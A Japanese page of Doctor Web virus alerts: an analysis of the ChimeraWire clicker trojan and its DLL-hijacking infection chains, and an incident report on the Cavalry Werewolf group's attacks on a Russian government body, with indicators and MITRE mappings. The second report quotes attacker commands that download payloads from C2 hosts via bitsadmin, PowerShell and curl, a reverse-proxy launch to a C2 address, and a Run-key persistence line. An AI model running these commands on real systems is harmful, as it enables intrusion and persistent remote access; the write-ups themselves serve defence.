ウイルスアラート

キメラ退治の英雄ベレロフォンも驚愕：巧みに人間になりすましサイトの人気度を高めるトロイの木馬ChimeraWire

Wed, 10 Dec 2025 01:00:00 GMT

2025年12月10日

序論

Doctor Webのエキスパートは、アフィリエイトプログラムの1つを解析中にクリッカー機能を備えたユニークなマルウェアを発見しました。Trojan.ChimeraWireと名づけられたこのマルウェアはWebサイトやWebアプリケーションの管理を自動化するオープンソースプロジェクトzlsgoとRodをベースにしたもので、Microsoft Windows搭載コンピューターを標的としています。

このTrojan.ChimeraWireを使用することで、サイバー犯罪者はユーザーによる操作を装ってWebサイト内のユーザー行動を向上させ、そのサイトが検索エンジンでの検索結果に表示される順位を人為的に引き上げることができます。そのために、このマルウェアは検索エンジンGoogleとBing内で目的のサイトを探してそれらを開き、そのサイト上でユーザーの操作を模倣してリンクをクリックします。Trojan.ChimeraWireはすべての悪意のある動作を、特定のドメインからダウンロードしてWebSocketプロトコル経由のデバッグモードで起動させたGoogle Chromeブラウザ内にて実行します。

Trojan.ChimeraWireは複数の悪意のあるダウンローダを通じてコンピューターに侵入します。これらのダウンローダはDLL検索順序ハイジャッキング脆弱性の悪用をベースとするさまざまな権限昇格手法や、検出を回避するためのアンチデバッグ手法を用います。Doctor Webのアンチウイルスラボでは、これらのマルウェアが関与する感染チェーンを少なくとも2つ追跡しています。そのうちの1つでは悪意のあるスクリプトPython.Downloader.208が中心的役割を担い、もう1つのチェーンではTrojan.DownLoader48.61444が中心となっています。このTrojan.DownLoader48.61444の動作原理は悪意のあるスクリプトPython.Downloader.208のものとほぼ同じであり、実質的にその代替として使用されています。

本稿では、Trojan.ChimeraWireの特徴と、このトロイの木馬をユーザーのデバイス上に送り込むために用いられる悪意のあるアプリについて解説します。

1つ目の感染チェーン

１つ目の感染チェーンを示す図

１つ目の感染チェーンはTrojan.DownLoader48.54600から始まります。このマルウェアはそれが人工的な環境で動作しているかどうかを検証し、仮想マシンやデバッグモードの徴候を検知すると動作を終了します。そのような徴候がない場合はC2サーバーからZIPアーカイブpython3.zipをダウンロードします。これには悪意のあるスクリプトPython.Downloader.208と、その動作に必要な追加のファイル（Trojan.Starter.8377である悪意のあるライブラリISCSIEXE.dllなど）がいくつか含まれており、Trojan.DownLoader48.54600はこのアーカイブを解凍してスクリプトを実行します。このスクリプトPython.Downloader.208はC2サーバーから次の段階を受信するダウンローダで、感染の第2段階を担います。

Python.Downloader.208の動作は実行時の権限によって異なります。管理者権限なしで実行された場合はその権限を取得しようと試みます。そのために、Python.Downloader.208と一緒に抽出されたTrojan.Starter.8377がディレクトリ%LOCALAPPDATA%\Microsoft\WindowsAppsにコピーされ、さらにスクリプトruns.vbsが作成されます。このスクリプトは後にPython.Downloader.208を再度実行するために使用されます。

次に、Python.Downloader.208はシステムアプリ%SystemRoot%\SysWOW64\iscsicpl.exeを起動させます。このアプリにはDLL検索順序ハイジャッキング脆弱性が存在するため、正規のWindowsコンポーネントと同じ名前を持つトロイの木馬ライブラリISCSIEXE.dllが自動的に読み込まれます。

続けて、Trojan.Starter.8377がVBSスクリプトruns.vbsを実行し、このスクリプトがPython.Downloader.208を今度は管理者権限で実行します。

必要な権限で実行されると、Python.Downloader.208はパスワード保護されたアーカイブonedrive.zipをC2サーバーからダウンロードします。このアーカイブには次の感染段階であるTrojan.DownLoader48.54318がライブラリUpdateRingSettings.dllとして含まれているほか、その動作に必要な追加のファイル（Windowsに組み込まれたOneDriveの一部であり有効なデジタル署名を持った正規アプリOneDrivePatcher.exeなど）も格納されています。

Python.Downloader.208はアーカイブを解凍すると、アプリOneDrivePatcher.exeがシステム起動時に実行されるようにするタスクをシステムスケジューラに作成します。次にPython.Downloader.208はこのアプリを起動しますが、このアプリもDLL検索順序ハイジャッキング脆弱性を持つため、OneDriveのコンポーネントと同じ名前が付いた悪意のあるライブラリUpdateRingSettings.dll（Trojan.DownLoader48.54318）が自動的に読み込まれます。

Trojan.DownLoader48.54318はコントロールを掌握すると自身が人工的な環境で実行されているかどうかをチェックし、仮想マシンやデバッグモードで動作している徴候を検知すると動作を終了します。

そのような徴候が検知されなかった場合、Trojan.DownLoader48.54318はC2サーバーからペイロードとその復号化に使用するキーをダウンロードします。

復号化されたペイロードはシェルコードと実行ファイルを含んだZLIBコンテナで、Trojan.DownLoader48.54318は復号化の後このコンテナを解凍しようとします。解凍に失敗した場合、トロイの木馬は自身を削除し、アクティブなプロセスを終了します。解凍に成功した場合はコントロールがシェルコードに受け渡され、このシェルコードが一緒に含まれている実行ファイルを解凍します。このファイルが感染の最終段階、すなわち最終的な目的であるトロイの木馬Trojan.ChimeraWireです。

2つ目の感染チェーン

2つ目の感染チェーンはマルウェアTrojan.DownLoader48.61444から始まります。このマルウェアは起動されると管理者権限を持っているかどうかをチェックし、持っていない場合は取得しようとします。Trojan.DownLoader48.61444はセキュリティシステムをすり抜けるためにMasquerade PEB手法を使用しており、正規のプロセスexplorer.exeに偽装しています。

次に、システムライブラリ%SystemRoot%\System32\ATL.dllのコピーにパッチを適用します。そのために、Trojan.DownLoader48.61444はそのコンテンツを読み取り、復号化されたバイトコードとトロイの木馬ファイルへのパスをそこに追加します。そうして改変したコピーをファイルdropperとして、元々置かれていた同じディレクトリに保存します。その後、サービス%SystemRoot%\System32\wbemと改変したライブラリのWindowsシェルCOMオブジェクトを初期化します。初期化に成功すると、Trojan.DownLoader48.61444はCMSTPLUA COMインターフェースを使用して、一部の古いCOMインターフェースによくある脆弱性を悪用することで管理者権限を取得しようと試みます。

成功すると、改変されたライブラリdropperがATL.dllファイルとしてディレクトリ%SystemRoot%\System32\wbemにコピーされます。その後、Trojan.DownLoader48.61444はWindows Management InstrumentationWmiMgmt.mscを起動します。その結果、システムアプリmmc.exeに存在するDLL検索順序ハイジャッキング脆弱性が悪用され、パッチの適用されたライブラリ%SystemRoot%\System32\wbem\ATL.dllが自動的に読み込まれます。そしてこのライブラリがTrojan.DownLoader48.61444を再度、今度は管理者権限で実行します。

管理者権限がない場合のTrojan.DownLoader48.61444の動作を示す図

管理者権限で実行されると、Trojan.DownLoader48.61444はC2サーバーからペイロードをダウンロードするための複数のPowerShellスクリプトを実行します。ダウンロードされるオブジェクトの 1 つが ZIP アーカイブone.zipで、これには1つ目の感染チェーンでダウンロードされるアーカイブonedrive.zipと同じファイル（正規アプリOneDrivePatcher.exeと、Trojan.DownLoader48.54318である悪意のあるライブラリUpdateRingSettings.dll）が含まれています。

Trojan.DownLoader48.61444はアーカイブを解凍し、 OneDrivePatcher.exeがシステム起動時に実行されるようにするタスクをシステムスケジューラに作成した後、このアプリを起動します。1つ目の感染チェーン同様、OneDrivePatcher.exeに存在するDLL検索順序ハイジャッキング脆弱性が悪用され、トロイの木馬ライブラリUpdateRingSettings.dllが自動的に読み込まれます。その後のシナリオは1つ目の感染チェーンと同じです。

同時に、Trojan.DownLoader48.61444は2つ目のZIPアーカイブtwo.zipもダウンロードします。これには悪意のあるスクリプトPython.Downloader.208（update.py）と、その実行に必要なファイルが含まれています。そのうちの1つがGuardian.exeで、これは名前を変更されたPythonコンソールインタープリタpythonw.exeです。

アーカイブを解凍すると、Trojan.DownLoader48.61444はGuardian.exeがシステム起動時に実行されるようにするタスクをシステムスケジューラに作成します。さらに、このアプリを介して悪意のあるスクリプトPython.Downloader.208を直接実行します。

1つ目の感染チェーンと同じプロセスを部分的に採用することで、脅威アクターは標的システムにTrojan.ChimeraWireがダウンロードされる確率を高めようと目論んだものとみられます。

管理者権限を取得したTrojan.DownLoader48.61444の動作を示す図

Trojan.ChimeraWire

Trojan.ChimeraWireという名前は、異なる動物の身体的特徴をあわせ持つ神話上の怪物「chimera（キメラ）」と「wire（ワイヤー）」を組み合わせたものです。「chimera」は攻撃者が複数の手法（異なるプログラミング言語で書かれたダウンローダ型トロイの木馬の使用、アンチデバッグ技術の使用、感染プロセスにおける権限昇格）を用いるというそのハイブリッドな特徴を表しています。さらに、このトロイの木馬がさまざまなフレームワーク、プラグイン、そして密かにトラフィックをコントロールするための正規ソフトウェアを組み合わせたものであるという事実も反映しています。2つ目の単語「wire」はここに関わってきます。これはトロイの木馬が目に見えないところで悪意のあるネットワーク操作を実行するということを示しています。

Trojan.ChimeraWireは標的のコンピューターに侵入するとサードパーティサイトからアーカイブchrome-win.zipをダウンロードします。このアーカイブにはWindows用のGoogle Chromeブラウザが含まれています。ここで注意したいのは、このサイトにはLinuxやmacOSなどの他のOS向けGoogle Chromeビルド（さまざまなハードウェアプラットフォーム用のものを含む）を含んだアーカイブも置かれているという点です。

トロイの木馬が必要なアーカイブをダウンロードする、さまざまなGoogle Chromeビルドを提供するサイト

ブラウザがダウンロードされると、Trojan.ChimeraWireはそこにCAPTCHAを自動で解決するよう設計されたアドオンNopeCHAとBusterを密かにインストールします。これらのアドオンはトロイの木馬が動作中に使用します。

次に、ブラウザをデバッグモードでウィンドウを表示せずに起動します。これにより、ユーザーに気づかれることなく悪意のある動作を実行することが可能になります。その後、自動的に選択されたデバッグポートとの接続がWebSocketプロトコル経由で確立されます。

続けて、トロイの木馬はタスクの受信へと進みます。C2サーバーにリクエストを送信し、応答としてBase64文字列を受け取ります。この文字列にはAES-GCMアルゴリズムで暗号化されたJSON形式での設定が含まれています。

トロイの木馬がC2サーバーから受信する設定の例

この設定には、以下のタスクとそれに関連するパラメータが含まれています。

対象とする検索エンジン（GoogleとBingに対応）
対象の検索エンジン内でサイトを検索し、それらを開くためのキーフレーズ
Webページ連続遷移の最大回数
Webページ上で自動クリックを実行するためのランダム分布
ページの読み込み待機時間
対象ドメイン

実際のユーザー操作をより高度に模倣し、途切れのないアクティビティを監視するシステムをすり抜けるために、この設定には作業セッションと作業セッションの間で一時停止するためのパラメータも含まれています。

ユーザーのマウスクリックを模倣

Trojan.ChimeraWireは次のタイプのクリックを実行することができます。

検索結果をナビゲートするためのクリック
見つかった目的のリンクを新しいバックグラウンドタブで開くためのクリック

まず初めに、Trojan.ChimeraWireは対象とする検索エンジンを使用して、設定内で指定されているドメインとキーフレーズでWebサイトを検索します。次に、検索結果に表示されたサイトを開き、ハイパーリンクを定義するHTML要素をすべて見つけ出します。トロイの木馬はこれらの要素をデータ配列にしてシャッフルし、そこに含まれるすべてのオブジェクトがWebページに表示された結果と異なる順番になるように並べ替えます。これは、クリック順序を追跡するWebサイトのボット対策機能を回避する目的で行われます。

続けて、Trojan.ChimeraWireは見つけたリンクとそこに含まれる文字列が設定内のテンプレートと一致するかどうかをチェックし、一致した数を計算します。トロイの木馬のその後の動作はこの一致数に応じて異なります。

ページ上で十分な数の一致するリンクが見つかった場合、Trojan.ChimeraWireはそのページをスキャンし、検出されたリンクを関連度の高い順に並べ替えます（キーフレーズに最も一致するものが最初にくるように）。その後、1つないしは複数の一致するリンクがクリックされます。

指定されたテンプレートとの十分な数の一致がない場合や、まったく一致がない場合、Trojan.ChimeraWireは実際の人間の行動を可能な限りそっくりに模倣する確率的行動モデルのアルゴリズムを使用し、設定内に含まれているパラメータと重み付け分布に基づいて開くリンクの数を決定します。たとえば、分布が["1:90", "2:10"]の場合、トロイの木馬は90%の確率で1つのリンクをクリックし、20%の確率で2つのリンクをクリックします。つまり、リンクが1つクリックされる可能性が極めて高いということになります。Trojan.ChimeraWireは先の工程で作成したデータ配列の中からリンクをランダムに選択してクリックを実行します。

トロイの木馬が検索結果からリンクを開いてそのWebページ上でクリックを実行するたびに、指定されたタスクに応じて前のブラウザタブに戻るかまたは次のタブに進みます。そしてこの動作が、対象となるサイトでのクリック数の上限に達するまで繰り返されます。

以下は、トロイの木馬がC2サーバーから受信したタスクで操作するように指示されていたWebサイトの例です。

トロイの木馬ChimeraWireならびにそのダウンロードに関与するマルウェアに関する詳細な技術的情報については、本調査レポートのPDFバージョンまたはDoctor Webウイルスライブラリを参照してください。

Trojan.ChimeraWireの詳細 ※英語 Trojan.DownLoader48.54600の詳細 ※英語 Trojan.Starter.8377の詳細 ※英語 Python.Downloader.208の詳細 ※英語 Trojan.DownLoader48.54318の詳細 ※英語 Trojan.DownLoader48.61444の詳細 ※英語

結論

現在のところ、Trojan.ChimeraWireの実行する悪意のあるアクティビティは、要するにWebサイトの人気度を高めることを目的としたクリック操作だけという比較的単純なものにとどまっています。しかしながら、このトロイの木馬がベースとするツールには、実際のユーザーによる操作を装った自動アクションなどといったより広範なタスクの実行を可能とする機能が備わっています。たとえば、悪意のある脅威アクターはTrojan.ChimeraWireを使用して、広告目的のアンケートを実施するものなどあらゆるサイトのWebフォームに自動入力することができます。さらに、サイバースパイ活動やさまざまなデータベース（メールアドレス、電話番号などの）を構築するためのデータ自動収集を目的に、Webページの内容を読み取ったりそれらのスクリーンショットを撮ったりすることも可能です。

したがって、将来的にはこうした機能が完全に実装されたTrojan.ChimeraWireの新たなバージョンが登場するものと考えられます。Doctor Webではこのトロイの木馬の進化を引き続き監視していきます。

MITRE ATT&CK®

Stage（段階）	Technique（技術・手法）
Execution（実行）	T1204：User execution（ユーザーによる実行） T1204.002：Malicious File（悪意のあるファイル） T1204.005：Malicious Library（悪意のあるライブラリ） T1059.001：PowerShell T1059.003：Windows Command Shell T1059.005：Visual Basic T1059.006：Python T1053.005：Scheduled Task（スケジュールされたタスク）
Persistence（永続化）	T1547.001：Registry Run Keys / Startup Folder （レジストリRunキー/スタートアップフォルダ） T1053：Scheduled Task/Job（スケジュールされたタスク/ジョブ）
Privilege Escalation（権限昇格）	T1574.001：Hijack Execution Flow: DLL （実行フローのハイジャック：DLL） T1548.002：Bypass User Account Control （ユーザーアカウント制御のバイパス）
Defense Evasion（防御回避）	T1027.013：Encrypted/Encoded File（暗号化/エンコードされたファイル） T1622：Debugger Evasion（デバッガ回避 T1564.003：Hidden Window （非表示ウィンドウ） T1564.012：File/Path Exclusions（ファイル/パスの除外） T1140：Deobfuscate/Decode Files or Information（ファイルまたは情報の難読化解除/デコード） T1574.001：Hijack Execution Flow: DLL （実行フローのハイジャック：DLL）
Command and Control（コマンド・アンド・コントロール）	T1102.002：Bidirectional Communication（双方向通信） T1071.001：Web Protocols（Webプロトコル）

Indicators of compromise（セキュリティ侵害インジケーター）

ハッカー集団「Cavalry Werewolf」がロシア政府機関を攻撃

Tue, 11 Nov 2025 03:00:00 GMT

2025年11月11日

序論

2025年７月、Doctor Webはクライアントであるロシア政府機関の1つから、内部ネットワークが侵害されている疑いがあるという連絡を受けました。疑いを抱くきっかけとなったのは、同機関のメールアドレスの１つからスパムメールが送信されていることが検出されたことでした。Doctor Webのアンチウイルスラボによるインシデント調査の結果、当該機関はハッカー集団による標的型攻撃を受けていたことが明らかになり、その集団は「Cavalry Werewolf」であることが特定されました。この攻撃は機密情報とネットワーク設定データを収集することを目的の１つとしたものでした。

この調査において、Doctor Webのエキスパートはオープンソースツールを含むこれまでに知られていなかったマルウェアを特定することに成功しました。それらの一部として、攻撃対象システム上でのリモートコマンド実行を可能にし、偵察とそれに続くネットワークインフラストラクチャ内での足場固めのための環境を整える複数のバックドアが確認されています。

本稿では、発見されたCavalry Werewolfのツールや同ハッカー集団の特徴、そしてこれらのサイバー犯罪者たちが侵害されたネットワーク内で実行する典型的なアクションについて解説します。

攻撃および使用されたツールに関する全般的情報

1台目のコンピューターに対する初期アクセス（最初のアクセス）には一般的な攻撃ベクトルが用いられています。すなわち、文書に偽装したマルウェアの添付されたフィッシングメールです。今回の事例では、攻撃時点で未知のバックドアであったBackDoor.ShellNET.1がメッセージに含まれていました。これはオープンソースソフトウェアReverse-Shell-CSをベースにしたバックドアで、感染したシステムにリバースシェル経由でリモート接続してさまざまなコマンドを実行することを可能にします。このバックドアはパスワード保護されたアーカイブ内に仕込まれており、フィッシングキャンペーンごとに異なる名前が付いています。

BackDoor.ShellNET.1に付けられたファイル名のバリエーション
Службеная записка от 16.06.2025___________________________.exe
О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe
О проведении личного приема граждан список участников.exe
О работе почтового сервера план и проведенная работа.exe

BackDoor.ShellNET.1の添付されたフィッシングメールの例：攻撃者は「文書」を読むよう受信者に促し、アーカイブを解凍するためのパスワードを提供している

攻撃者は BackDoor.ShellNET.1 を使用して標的システム内での足がかりの構築を進めました。ファイル転送タスクを管理するためのWindows標準ツールBitsadmin（C:\Windows\SysWOW64\bitsadmin.exe）を介して複数の悪意のあるプログラムがダウンロードされています。このプログラムは特定のコマンドラインスイッチを使用して現在のシステム管理者として起動されていました。以下はその例です

cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe

BackDoor.ShellNET.1 によって最初にダウンロードされた脅威はスティーラーTrojan.FileSpyNET.5でした。このトロイの木馬を使用して、攻撃者はコンピューター上に保存されている .doc、.docx、.xlsx、.pdf 形式の文書、テキストファイル（.txt）、画像ファイル（.jpg、.png）をダウンロードしています。

次に、バックドアBackDoor.Tunnel.41（オープンソースソフトウェアReverseSocks5）がインストールされました。攻撃者はこのバックドアを使用することでSOCKS5トンネルを作成して密かにコンピューターに接続し、そこでコマンドを実行（別のマルウェアをインストールするなど）しています。

Cavalry Werewolfのツール

今回のインシデントに関する調査の結果、Cavalry Werewolfによる標的型攻撃では上記のマルウェアのみでなく他のツールも多数使用されていることが明らかになりました。Cavalry Werewolfのマルウェア作成者は武器として用いるマルウェアの組み合わせを1つにとどめることなく、その数を常に増やし続けているという点に注意する必要があります。そのため、標的システムへの侵入に使用されるツールや感染チェーンにおけるその先の段階は、攻撃対象となる組織によって異なる場合があります。

エントリーポイント（侵入口）

感染チェーンの第一段階となるのはCavalry Werewolfから送信されるフィッシングメールに仕込まれたマルウェアです。ただし、それらマルウェアの種類は1つだけではありません。Doctor Webのウイルスアナリストによって以下が特定されています。

スクリプト（BAT.DownLoader.1138）
実行ファイル（Trojan.Packed2.49708、 Trojan.Siggen31.54011、 BackDoor.Siggen2.5463、 BackDoor.RShell.169、 BackDoor.ReverseShell.10）

BAT.DownLoader.1138

PowerShellバックドアPowerShell.BackDoor.109を標的システムにダウンロードするバッチファイルです。このバックドアはコンピューター上に別のマルウェアをダウンロードして起動する目的で攻撃者によって使用されます。

BAT.DownLoader.1138の既知のファイル名	SHA1ハッシュ	С2サーバー
scan26_08_2025.bat	d2106c8dfd0c681c27483a21cc72d746b2e5c18c	168[.]100.10[.]73

Trojan.Packed2.49708

本体内に暗号化された形で格納されているバックドアBackDoor.Spy.4033をインストールするトロイの木馬です。このバックドアは、攻撃者が感染したシステム上でリバースシェル経由でコマンドを実行することを可能にします。

Trojan.Packed2.49708の既知のファイル名	SHA1ハッシュ	С2サーバー
О проведении личного приема граждан список участников план и проведенная работа.exe C:\Windows\2o1nzu.exe	5684972ded765b0b08b290c85c8fac8ed3fea273	185[.]173.37[.]67
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe	29ee3910d05e248cfb3ff62bd2e85e9c76db44a5	185[.]231.155[.]111
О работе почтового сервера план и проведенная работа.exe Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe План-протокол встречи о сотрудничестве представителей должн.лиц.exe	ce4912e5cd46fae58916c9ed49459c9232955302	109[.]172.85[.]95
C:\Windows\746wljxfs.exe	653ffc8c3ec85c6210a416b92d828a28b2353c17	185[.]173.37[.]67
—	b52e1c9484ab694720dc62d501deca2aa922a078	109[.]172.85[.]95

Trojan.Siggen31.54011

本体内に暗号化された形で格納されているバックドアBackDoor.Spy.4038をインストールするトロイの木馬です。このバックドアは、攻撃者が感染したシステム上でリバースシェル経由でコマンドを実行することを可能にします。

Trojan.Siggen31.54011の機能はTrojan.Packed2.49708と似ていますが、ペイロードの抽出アルゴリズムがわずかに異っています。

SHA1ハッシュ	С2サーバー
baab225a50502a156222fcc234a87c09bc2b1647	109[.]172.85[.]63
93000d43d5c54b07b52efbdad3012e232bdb49cc	109[.]172.85[.]63

BackDoor.Siggen2.5463

Telegramボットを介して操作され、攻撃者から受け取ったタスクを実行するバックドアです。このマルウェアのメイン機能は本体内に隠されたPowerShellコードにあります。

BackDoor.Siggen2.5463の既知のファイル名	SHA1ハッシュ	ペイロード
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe system.exe	c96beb026dc871256e86eca01e1f5ba2247a0df6	PowerShell.BackDoor.108

BackDoor.RShell.169

攻撃者がリバースシェル経由で感染したコンピューターにリモート接続し、さまざまなコマンドを実行できるようにするバックドアです。

BackDoor.RShell.169の既知のファイル名	SHA1ハッシュ	С2サーバー
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe	633885f16ef1e848a2e057169ab45d363f3f8c57	109[.]172.85[.]63

BackDoor.ReverseShell.10

リバースシェルを有効にし、攻撃者にシステムへのリモートアクセスを提供するバックドアです。

BackDoor.ReverseShell.10の既知のファイル名	SHA1ハッシュ	С2サーバー
к проектам.exe Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe	dd98dcf6807a7281e102307d61c71b7954b93032	195[.]2.78[.]133
Служебная записка от 20.08.2025 .exe Служебная записка от 12.08.2025 .exe	f546861adc7c8ca88e3b302d274e6fffb63de9b0	62[.]113.114[.]209

次の感染段階

デバイスが侵害された後、その感染したデバイス上には以下のマルウェアがインストールされる可能性があります。

Trojan.Inject5.57968

本体内に暗号化されたバックドアを持つトロイの木馬です。そのバックドアは、攻撃者が感染したコンピューターに悪意のあるプログラムをダウンロードすることを可能にします。ペイロードの復号化は複数の段階で実行され、そのうちの1つで、Microsoft .NET Frameworkパッケージの一部であるaspnet_compiler.exeプログラムのプロセスに悪意のあるデータ配列が挿入されます。その後、完全に復号化されたバックドアがこの正規アプリのプロセスコンテキスト内で動作します。

インタラクティブな脅威アナライザーDr.Web vxCube の「サンドボックス」を使用した、Trojan.Inject5.57968のアクティビティ調査

Trojan.Inject5.57968の既知のファイル名	SHA1ハッシュ	С2サーバー	ペイロード
pickmum1.exe	e840c521ec436915da71eb9b0cfd56990f4e53e5	64[.]95.11[.]202	Trojan.PackedNET.3351
mummyfile1.exe	22641dea0dbe58e71f93615c208610f79d661228	64[.]95.11[.]202	Trojan.PackedNET.3351

BackDoor.ShellNET.2

Telegramボットを介して操作され、攻撃者から受け取ったコマンドを実行するバックドアです。

BackDoor.ShellNET.2の既知のファイル名	SHA1ハッシュ
win.exe	1957fb36537df5d1a29fb7383bc7cde00cd88c77

BackDoor.ReverseProxy.1

オープンソースソフトウェアReverseSocks5をベースにしたバックドアで、感染したシステム上でSOCKS5プロキシを有効にしてリモートアクセスを可能にします。BackDoor.ReverseProxy.1は -connect IPパラメータを指定してコマンドインタープリタcmd.exeから起動されることにより、目的のアドレスに接続します。アドレスがハードコードされている亜種も存在します。

以下のIPアドレスが検出されています。

78[.]128.112[.]209 (起動コマンドで指定)
96[.]9.125[.]168 (起動コマンドで指定)
188[.]127.231[.]136 (ハードコード)

BackDoor.ReverseProxy.1の既知のファイル名	SHA1ハッシュ
revv2.exe	6ec8a10a71518563e012f4d24499b12586128c55

Trojan.Packed2.49862

攻撃者によって悪意のあるコードが埋め込まれた、正規プログラムのトロイの木馬化されたバージョンの検出名です。アーカイバWinRarおよび7-Zip、開発ツールVisual Studio Code、テキストエディタAkelPadをはじめとする複数のアプリの悪意のある改変版が発見されています。メッセンジャーMAXに偽装したSumatra PDF Readerもそのうちの1つです。改変版は本来の機能を実行することはできず、起動されると埋め込まれたトロイの木馬コンポーネントを初期化するだけです。

これらの改変版には、サイバー犯罪者の目的に応じてあらゆる種類のマルウェアが仕込まれています。以下はその一部です。

BackDoor.ReverseProxy.1 (ReverseSocks5)
BackDoor.Shell.275 (AdaptixC2)
BackDoor.AdaptixC2.11 (AdaptixC2)
BackDoor.Havoc.16 (Havoc)
BackDoor.Meterpreter.227 (CobaltStrike)
Trojan.Siggen9.56514 (AsyncRAT)
Trojan.Clipper.808

Trojan.Packed2.49862の既知のファイル名	SHA1ハッシュ	С2サーバー	ペイロード
code.exe rev2.exe	8279ad4a8ad20bf7bbca0fc54428d6cdc136b776	188[.]127.231[.]136	BackDoor.ReverseProxy.1
code.exe revv.exe	a2326011368d994e99509388cb3dc132d7c2053f	192[.]168.11[.]10	BackDoor.ReverseProxy.1
7zr.exe winload.exe system.exe Recorded_TV.exe	451cfa10538bc572d9fd3d09758eb945ac1b9437	77[.]232.42[.]107	BackDoor.Shell.275
Command line RAR winlock.exe Recorded_TV.exe	a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2	77[.]232.42[.]107	BackDoor.AdaptixC2.11
winsrv.exe firefox.exe	bbe3a5ef79e996d9411c8320b879c5e31369921e	94[.]198.52[.]210	BackDoor.AdaptixC2.11
AkelPad.exe	e8ab26b3141fbb410522b2cbabdc7e00a9a55251	78[.]128.112[.]209	BackDoor.Havoc.16
7z.exe	dcd374105a5542ef5100f6034c805878153b1205	192[.]168.88[.]104	BackDoor.Meterpreter.227
7z.exe	e51a65f50b8bb3abf1b7f2f9217a24acfb3de618	192[.]168.1[.]157	Trojan.Siggen9.56514
7z.exe chromedriver.exe	d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4	Telegram-бот	Trojan.Clipper.808
7z 7z.exe svc_host.exe dzveo09ww.exe	c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81	Telegram-бот	Trojan.Clipper.808
—	b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5	Telegram-бот	Trojan.Clipper.808
max - для бизнеса.exe	b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231	89[.]22.161[.]133	BackDoor.Havoc.16

侵害されたネットワーク内でCavalry Werewolfが実行する典型的なアクション

標的となる組織のコンピューターインフラストラクチャに侵入した攻撃者は、データ収集やシステム内でのさらなる足場固めを目的としたさまざまなアクションを実行します。

感染させたコンピューターに関する情報を収集するために、以下のコマンドを実行します。

whoami — カレントユーザーに関する情報を取得する
dir C:\\users\\<user>\\Downloads — カレントユーザーの「ダウンロード」フォルダ内にあるファイルのリストを取得する
dir C:\\users\\public\\pictures\\ — 共有フォルダの「ピクチャ」フォルダ内にあるファイルのリストを取得する（どのマルウェアがすでにシステム内にダウンロードされているかを特定するため）
ipconfig /all — ネットワーク設定を取得する
net user — システム内のすべてのユーザーのリストを取得する

プロキシサーバーに関する情報を収集し、ネットワークの機能をチェックするために、以下のコマンドを使用します。

powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'
curl -I https://google.com
curl -I https://google.com -x <proxy>

以下のツールを使用してネットワークを設定します。

Windows OSに含まれているコマンドラインツールnetsh

続けて、以下の正規ツールを使用して悪意のあるツールをシステムに送り込みます。

PowerShell （例: powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe）
Bitsadmin （例: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe）
curl （例: curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe）

システム内での足場を固めるために以下を実行します。

Windowsレジストリを変更する（例：REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\users\public\pictures\win.exe /f）

コマンドラインインタープリタcmd.exe を使用して悪意のあるツールを起動します。
例：

C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443 — BackDoor.ReverseProxy.1;
C:\\users\\public\\pictures\\732.exe — BackDoor.Tunnel.41.

攻撃者はPowerShellを使用して悪意のあるツールを削除できます。
例：

powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe

また、pingコマンドを使用してC2サーバーが利用可能であるかどうか定期的にチェックすることもできます。

ハッカー集団Cavalry Werewolfの特徴

ハッカー集団Cavalry Werewolfの大きな特徴として以下が挙げられます。

オープンソースソフトウェアを好んで使用する（オリジナルをそのまま使用する場合と、それをベースに独自のツールを開発する場合がある）。
メインとなるツールは、感染したシステム上でのリモートコマンド実行を可能にするさまざまなリバースシェルバックドアである。
元々は無害なプログラムに悪意のあるコードを埋め込むことができる。
感染したコンピューターを制御するためにTelegram APIを使用することが多い。
侵害したメールアドレスを使用して政府機関を装ったメールを送信するというフィッシングキャンペーンによって、感染の第一段階を担うマルウェアを送り込む。
その後の感染段階を担うマルウェアを標的デバイスにダウンロードするために、C:\\users\\public\\pictures、C:\\users\\public\\libraries、C:\\users\\public\\downloadsディレクトリを使用する。

このたび特定されたCavalry Werewolfのツールに関する詳細な技術的情報については、本調査レポートのPDFバージョンまたはDoctor Webウイルスライブラリを参照してください。

MITREマトリックス

Stage（段階）	Technique（技術・手法）
Initial access（初期アクセス）	T1566.001：Spearphishing attachment（スピアフィッシング添付ファイル）
Execution（実行）	T1204：User execution（ユーザーによる実行） T1059.001：PowerShell T1059.003：Windows Command Shell
Persistence（永続化）	T1547.001：Registry Run Keys / Startup Folder （レジストリRunキー／スタートアップフォルダ） T1197：BITS Jobs （BITSジョブ）
Privilege Escalation（権限昇格）	T1548.002：Bypass User Account Control（ユーザーアカウント制御のバイパス）
Defense Evasion（防御回避）	T1197：BITS Jobs（BITSジョブ）
Command and Control（コマンド・アンド・コントロール）	T1090.002：External Proxy（外部プロキシ） T1102.002：Bidirectional Communication（双方向通信）
Exfiltration（情報窃取）	T1041：Exfiltration Over C2 Channel（C2チャネルを介した盗み出し） T1567：Exfiltration Over Web Service（Webサービスを介した盗み出し）

Indicators of compromise(侵害の痕跡)※英語

急増する「ClickFix攻撃」とは

Wed, 29 Oct 2025 00:00:00 GMT

2025年10月29日

